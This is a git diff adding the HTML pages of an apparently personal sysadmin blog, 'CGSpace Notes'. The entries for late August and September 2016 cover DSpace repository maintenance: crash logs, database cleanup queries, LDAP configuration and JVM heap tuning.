+<li>Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs</li>
+</ul>
+<h2 id="2016-08-26">2016-08-26</h2>
+<ul>
+<li>CGSpace had issues tonight, not entirely crashing, but becoming unresponsive</li>
+<li>The dspace log had this:</li>
+</ul>
+<pre tabindex="0"><code>2016-08-26 20:48:05,040 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -                                                               org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+</code></pre><ul>
+<li>Related to /rest no doubt</li>
+</ul>
+<h2 id="2016-08-27">2016-08-27</h2>
+<ul>
+<li>Run corrections for Delia Grace and <code>CONGO, DR</code>, and deploy August changes to CGSpace</li>
+<li>Run all system updates and reboot the server</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-09/index.html b/docs/2016-09/index.html
new file mode 100644
index 000000000..d3fa55ffb
--- /dev/null
+++ b/docs/2016-09/index.html
@@ -0,0 +1,660 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="September, 2016" />
+<meta property="og:description" content="2016-09-01
+
+Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors
+Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace
+We had been using DC=ILRI to determine whether a user was ILRI or not
+It looks like we might be able to use OUs now, instead of DCs:
+
+$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-09/" />
+<meta property="article:published_time" content="2016-09-01T15:53:00+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="September, 2016"/>
+<meta name="twitter:description" content="2016-09-01
+
+Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors
+Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace
+We had been using DC=ILRI to determine whether a user was ILRI or not
+It looks like we might be able to use OUs now, instead of DCs:
+
+$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "September, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-09/",
+  "wordCount": "3298",
+  "datePublished": "2016-09-01T15:53:00+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-09/">
+
+    <title>September, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-09/">September, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-09-01T15:53:00+03:00">Thu Sep 01, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-09-01">2016-09-01</h2>
+<ul>
+<li>Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors</li>
+<li>Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace</li>
+<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
+<li>It looks like we might be able to use OUs now, instead of DCs:</li>
+</ul>
+<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
+</code></pre><ul>
+<li>User who has been migrated to the root vs user still in the hierarchical structure:</li>
+</ul>
+<pre tabindex="0"><code>distinguishedName: CN=Last\, First (ILRI),OU=ILRI Kenya Employees,OU=ILRI Kenya,OU=ILRIHUB,DC=CGIARAD,DC=ORG
+distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Ethiopia,DC=ILRI,DC=CGIARAD,DC=ORG
+</code></pre><ul>
+<li>Changing the DSpace LDAP config to use <code>OU=ILRIHUB</code> seems to work:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/09/ilri-ldap-users.png" alt="DSpace groups based on LDAP DN"></p>
+<ul>
+<li>Notes for local PostgreSQL database recreation from production snapshot:</li>
+</ul>
+<pre tabindex="0"><code>$ dropdb dspacetest
+$ createdb -O dspacetest --encoding=UNICODE dspacetest
+$ psql dspacetest -c &#39;alter user dspacetest createuser;&#39;
+$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
+$ psql dspacetest -c &#39;alter user dspacetest nocreateuser;&#39;
+$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
+$ vacuumdb dspacetest
+</code></pre><ul>
+<li>Some names that I thought I fixed in July seem not to be:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
+      text_value       |              authority               | confidence
+-----------------------+--------------------------------------+------------
+ Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb |        600
+ Poole, Elizabeth Jane | 41628f42-fc38-4b38-b473-93aec9196326 |        600
+ Poole, Elizabeth Jane | 83b82da0-f652-4ebc-babc-591af1697919 |        600
+ Poole, Elizabeth Jane | c3a22456-8d6a-41f9-bba0-de51ef564d45 |        600
+ Poole, E.J.           | c3a22456-8d6a-41f9-bba0-de51ef564d45 |        600
+ Poole, E.J.           | 0fbd91b9-1b71-4504-8828-e26885bf8b84 |        600
+(6 rows)
+</code></pre><ul>
+<li>At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;c3a22456-8d6a-41f9-bba0-de51ef564d45&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
+UPDATE 69
+</code></pre><ul>
+<li>And for Peter Ballantyne:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
+    text_value     |              authority               | confidence
+-------------------+--------------------------------------+------------
+ Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 |        600
+ Ballantyne, Peter | 4f04ca06-9a76-4206-bd9c-917ca75d278e |        600
+ Ballantyne, P.G.  | 4f04ca06-9a76-4206-bd9c-917ca75d278e |        600
+ Ballantyne, Peter | ba5f205b-b78b-43e5-8e80-0c9a1e1ad2ca |        600
+ Ballantyne, Peter | 20f21160-414c-4ecf-89ca-5f2cb64e75c1 |        600
+(5 rows)
+</code></pre><ul>
+<li>Again, a few have the correct ORCID, but there should only be one authority&hellip;</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;4f04ca06-9a76-4206-bd9c-917ca75d278e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
+UPDATE 58
+</code></pre><ul>
+<li>And for me:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, A%&#39;;
+ text_value |              authority               | confidence
+------------+--------------------------------------+------------
+ Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 |        600
+ Orth, A.   | 4884def0-4d7e-4256-9dd4-018cd60a5871 |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+(3 rows)
+dspacetest=# update metadatavalue set authority=&#39;1a1943a0-3f87-402f-9afe-e52fb46a513e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, %&#39;;
+UPDATE 11
+</code></pre><ul>
+<li>And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0e414b4c-4671-4a23-b570-6077aca647d8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
+UPDATE 166
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
+       text_value       |              authority               | confidence
+------------------------+--------------------------------------+------------
+ Campbell, Bruce        | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
+ Campbell, Bruce Morgan | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
+ Campbell, B.           | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
+ Campbell, B.M.         | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
+(4 rows)
+</code></pre><ul>
+<li>After updating the Authority indexes (<code>bin/dspace index-authority</code>) everything looks good</li>
+<li>Run authority updates on CGSpace</li>
+</ul>
+<h2 id="2016-09-05">2016-09-05</h2>
+<ul>
+<li>After one week of logging TLS connections on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code># zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
+217
+# zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
+1164376
+# zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk &#39;{print $6}&#39; | sort | uniq
+TLSv1/DES-CBC3-SHA
+TLSv1/EDH-RSA-DES-CBC3-SHA
+</code></pre><ul>
+<li>So this represents <code>0.02%</code> of 1.16M connections over a one-week period</li>
+<li>Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:</li>
+</ul>
+<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
+</code></pre><ul>
+<li>This gives you, for example: <code>Mainstreaming gender in agricultural R&amp;D.pdf__description:Brief</code></li>
+</ul>
+<h2 id="2016-09-06">2016-09-06</h2>
+<ul>
+<li>Trying to import the records for CIAT from yesterday, but having filename encoding issues from their zip file</li>
+<li>Create a zip on Mac OS X from a SAF bundle containing only one record with one PDF:
+<ul>
+<li>Filename: Complementing Farmers Genetic Knowledge Farmer Breeding Workshop in Turipaná, Colombia.pdf</li>
+<li>Imports fine on DSpace running on Mac OS X</li>
+<li>Fails to import on DSpace running on Linux with error <code>No such file or directory</code></li>
+</ul>
+</li>
+<li>Change diacritic in file name from á to a and re-create SAF bundle and zip
+<ul>
+<li>Success on both Mac OS X and Linux&hellip;</li>
+</ul>
+</li>
+<li>Looks like on the Mac OS X file system the file names represent á as: a (U+0061) +  ́ (U+0301)</li>
+<li>See: <a href="http://www.fileformat.info/info/unicode/char/e1/index.htm">http://www.fileformat.info/info/unicode/char/e1/index.htm</a></li>
+<li>See: <a href="http://demo.icu-project.org/icu-bin/nbrowser?t=%C3%A1&amp;s=&amp;uv=0">http://demo.icu-project.org/icu-bin/nbrowser?t=%C3%A1&amp;s=&amp;uv=0</a></li>
+<li>If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8</li>
+<li>We should definitely clean filenames so they don&rsquo;t use characters that are tricky to process in CSV and shell scripts, like: <code>,</code>, <code>'</code>, and <code>&quot;</code></li>
+</ul>
+<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#34;&#34;).replace(&#34;,&#34;,&#34;&#34;).replace(&#39;&#34;&#39;,&#39;&#39;)
+</code></pre><ul>
+<li>I need to write a Python script to match that for renaming files in the file system</li>
+<li>When importing SAF bundles it seems you can specify the target collection on the command line using <code>-c 10568/4003</code> or in the <code>collections</code> file inside each item in the bundle</li>
+<li>Seems that the latter method causes a null pointer exception, so I will just have to use the former method</li>
+<li>In the end I was able to import the files after unzipping them ONLY on Linux
+<ul>
+<li>The CSV file was giving file names in UTF-8, and unzipping the zip on Mac OS X and transferring it was converting the file names to Unicode equivalence like I saw above</li>
+</ul>
+</li>
+<li>Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the <code>tomcat7</code> user, and deleting the bundle, for each collection&rsquo;s items:</li>
+</ul>
+<pre tabindex="0"><code>$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
+$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
+$ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
+</code></pre><h2 id="2016-09-07">2016-09-07</h2>
+<ul>
+<li>Erase and rebuild DSpace Test based on latest Ubuntu 16.04, PostgreSQL 9.5, and Java 8 stuff</li>
+<li>Reading about PostgreSQL maintenance and it seems manual vacuuming is only for certain workloads, such as heavy update/write loads</li>
+<li>I suggest we disable our nightly manual vacuum task, as we&rsquo;re a mostly read workload, and I&rsquo;d rather stick as close to the documentation as possible since we haven&rsquo;t done any testing/observation of PostgreSQL</li>
+<li>See: <a href="https://www.postgresql.org/docs/9.3/static/routine-vacuuming.html">https://www.postgresql.org/docs/9.3/static/routine-vacuuming.html</a></li>
+<li>CGSpace went down and the error seems to be the same as always (lately):</li>
+</ul>
+<pre tabindex="0"><code>2016-09-07 11:39:23,162 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+...
+</code></pre><ul>
+<li>Since CGSpace had crashed I quickly deployed the new LDAP settings before restarting Tomcat</li>
+</ul>
+<h2 id="2016-09-13">2016-09-13</h2>
+<ul>
+<li>CGSpace crashed twice today, errors from <code>catalina.out</code>:</li>
+</ul>
+<pre tabindex="0"><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+        at org.apache.commons.dbcp.PoolingDataSource.getConnection(PoolingDataSource.java:114)
+</code></pre><ul>
+<li>I enabled logging of requests to <code>/rest</code> again</li>
+</ul>
+<h2 id="2016-09-14">2016-09-14</h2>
+<ul>
+<li>CGSpace crashed again, errors from <code>catalina.out</code>:</li>
+</ul>
+<pre tabindex="0"><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+        at org.apache.commons.dbcp.PoolingDataSource.getConnection(PoolingDataSource.java:114)
+</code></pre><ul>
+<li>I restarted Tomcat and it was ok again</li>
+<li>CGSpace crashed a few hours later, errors from <code>catalina.out</code>:</li>
+</ul>
+<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
+        at java.lang.StringCoding.decode(StringCoding.java:215)
+</code></pre><ul>
+<li>We haven&rsquo;t seen that in quite a while&hellip;</li>
+<li>Indeed, in a month of logs it only occurs 15 times:</li>
+</ul>
+<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
+15
+</code></pre><ul>
+<li>I also see a bunch of errors from dspace.log:</li>
+</ul>
+<pre tabindex="0"><code>2016-09-14 12:23:07,981 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+</code></pre><ul>
+<li>Looking at REST requests, it seems there is one IP hitting us nonstop:</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
+    820 50.87.54.15
+  12872 70.32.99.142
+  25744 70.32.83.92
+# awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1  | sort -n | uniq -c | sort -h | tail -n 3
+   7966 181.118.144.29
+  54706 70.32.99.142
+ 109412 70.32.83.92
+</code></pre><ul>
+<li>Those are the same IPs that were hitting us heavily in July, 2016 as well&hellip;</li>
+<li>I think the stability issues are definitely from REST</li>
+<li>Crashed AGAIN, errors from dspace.log:</li>
+</ul>
+<pre tabindex="0"><code>2016-09-14 14:31:43,069 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+</code></pre><ul>
+<li>And more heap space errors:</li>
+</ul>
+<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
+19
+</code></pre><ul>
+<li>There are no more rest requests since the last crash, so maybe there are other things causing this.</li>
+<li>Hmm, I noticed a shitload of IPs from 180.76.0.0/16 are connecting to both CGSpace and DSpace Test (58 unique IPs concurrently!)</li>
+<li>They seem to be coming from Baidu, and so far during today alone account for 1/6 of every connection:</li>
+</ul>
+<pre tabindex="0"><code># grep -c ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
+29084
+# grep -c ip_addr=180.76.15 /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
+5192
+</code></pre><ul>
+<li>Other recent days are the same&hellip; hmmm.</li>
+<li>From the activity control panel I can see 58 unique IPs hitting the site <em>concurrently</em>, which has GOT to hurt our stability</li>
+<li>A list of all 2000 unique IPs from CGSpace logs today:</li>
+</ul>
+<pre tabindex="0"><code># grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: &#39;{print $5}&#39; | sort -n | uniq -c | sort -h | tail -n 100
+</code></pre><ul>
+<li>Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc&hellip; do we have any real users?</li>
+<li>Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
+</code></pre><ul>
+<li>Looking into the Catalina logs again around the time of the first crash, I see:</li>
+</ul>
+<pre tabindex="0"><code>Wed Sep 14 09:47:27 UTC 2016 | Query:id: 78581 AND type:2
+Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs.
+Commit
+Commit done
+dn:CN=Haman\, Magdalena  (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-193&#34; java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>And after that I see a bunch of &ldquo;pool error Timeout waiting for idle object&rdquo;</li>
+<li>Later, near the time of the next crash I see:</li>
+</ul>
+<pre tabindex="0"><code>dn:CN=Haman\, Magdalena  (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
+Wed Sep 14 11:29:55 UTC 2016 | Query:id: 79078 AND type:2
+Wed Sep 14 11:30:20 UTC 2016 | Updating : 6/6 docs.
+Commit
+Commit done
+Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas
+SEVERE: Failed to generate the schema for the JAX-B elements
+com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions
+java.util.Map is an interface, and JAXB can&#39;t handle interfaces.
+        this problem is related to the following location:
+                at java.util.Map
+                at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
+                at com.atmire.dspace.rest.common.Statlet
+java.util.Map does not have a no-arg default constructor.
+        this problem is related to the following location:
+                at java.util.Map
+                at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
+                at com.atmire.dspace.rest.common.Statlet
+</code></pre><ul>
+<li>Then 20 minutes later another outOfMemoryError:</li>
+</ul>
+<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
+        at java.lang.StringCoding.decode(StringCoding.java:215)
+</code></pre><ul>
+<li>Perhaps these particular issues <em>are</em> memory issues, the munin graphs definitely show some weird purging/allocating behavior starting this week</li>
+</ul>
+<p><img src="/cgspace-notes/2016/09/tomcat_jvm-day.png" alt="Tomcat JVM usage day">
+<img src="/cgspace-notes/2016/09/tomcat_jvm-week.png" alt="Tomcat JVM usage week">
+<img src="/cgspace-notes/2016/09/tomcat_jvm-month.png" alt="Tomcat JVM usage month"></p>
+<ul>
+<li>And really, we did reduce the memory of CGSpace in late 2015, so maybe we should just increase it again, now that our usage is higher and we are having memory errors in the logs</li>
+<li>Oh great, the configuration on the actual server is different than in configuration management!</li>
+<li>Seems we added a bunch of settings to the <code>/etc/default/tomcat7</code> in December, 2015 and never updated our ansible repository:</li>
+</ul>
+<pre tabindex="0"><code>JAVA_OPTS=&#34;-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts&#34;
+</code></pre><ul>
+<li>So I&rsquo;m going to bump the heap +512m and remove all the other experimental shit (and update ansible!)</li>
+<li>Increased JVM heap to 4096m on CGSpace (linode01)</li>
+</ul>
+<h2 id="2016-09-15">2016-09-15</h2>
+<ul>
+<li>Looking at Google Webmaster Tools again, it seems the work I did on URL query parameters and blocking via the <code>X-Robots-Tag</code> HTTP header in March, 2016 seem to have had a positive effect on Google&rsquo;s index for CGSpace</li>
+</ul>
+<p><img src="/cgspace-notes/2016/09/google-webmaster-tools-index.png" alt="Google Webmaster Tools for CGSpace"></p>
+<h2 id="2016-09-16">2016-09-16</h2>
+<ul>
+<li>CGSpace crashed again, and there are TONS of heap space errors but the datestamps aren&rsquo;t on those lines so I&rsquo;m not sure if they were yesterday:</li>
+</ul>
+<pre tabindex="0"><code>dn:CN=Orentlicher\, Natalie (CIAT),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
+Thu Sep 15 18:45:25 UTC 2016 | Query:id: 55785 AND type:2
+Thu Sep 15 18:45:26 UTC 2016 | Updating : 100/218 docs.
+Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs.
+Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs.
+Commit
+Commit done
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-247&#34; java.lang.OutOfMemoryError: Java heap space
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-241&#34; java.lang.OutOfMemoryError: Java heap space
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-243&#34; java.lang.OutOfMemoryError: Java heap space
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-258&#34; java.lang.OutOfMemoryError: Java heap space
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-268&#34; java.lang.OutOfMemoryError: Java heap space
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-263&#34; java.lang.OutOfMemoryError: Java heap space
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
+Exception in thread &#34;Thread-54216&#34; org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
+-e14ef82ee224 to the index; possible analysis error.
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
+        at com.atmire.statistics.SolrLogThread.run(SourceFile:25)
+</code></pre><ul>
+<li>I bumped the heap space from 4096m to 5120m to see if this is <em>really</em> about heap speace or not.</li>
+<li>Looking into some of these errors that I&rsquo;ve seen this week but haven&rsquo;t noticed before:</li>
+</ul>
+<pre tabindex="0"><code># zcat -f -- /var/log/tomcat7/catalina.* | grep -c &#39;Failed to generate the schema for the JAX-B elements&#39;
+113
+</code></pre><ul>
+<li>I&rsquo;ve sent a message to Atmire about the Solr error to see if it&rsquo;s related to their batch update module</li>
+</ul>
+<h2 id="2016-09-19">2016-09-19</h2>
+<ul>
+<li>Work on cleanups for author affiliations after Peter sent me his list of corrections/deletions:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i affiliations_pb-322-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p fuuu
+$ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2-deletions.csv -m 211 -u dspace -d dspace -p fuuu
+</code></pre><ul>
+<li>After that we need to take the top ~300 and make a controlled vocabulary for it</li>
+<li>I dumped a list of the top 300 affiliations from the database, sorted it alphabetically in OpenRefine, and created a controlled vocabulary for it (<a href="https://github.com/ilri/DSpace/pull/267">#267</a>)</li>
+</ul>
+<h2 id="2016-09-20">2016-09-20</h2>
+<ul>
+<li>Run all system updates on DSpace Test and reboot the server</li>
+<li>Merge changes for sponsorship and affiliation controlled vocabularies (<a href="https://github.com/ilri/DSpace/pull/267">#267</a>, <a href="https://github.com/ilri/DSpace/pull/268">#268</a>)</li>
+<li>Merge minor changes to <code>messages.xml</code> to reconcile it with the stock DSpace 5.1 one (<a href="https://github.com/ilri/DSpace/pull/269">#269</a>)</li>
+<li>Peter asked about adding title search to Discovery</li>
+<li>The index was already defined, so I just added it to the search filters</li>
+<li>It works but CGSpace apparently uses <code>OR</code> for search terms, which makes the search results basically useless</li>
+<li>I need to read the docs and ask on the mailing list to see if we can tweak that</li>
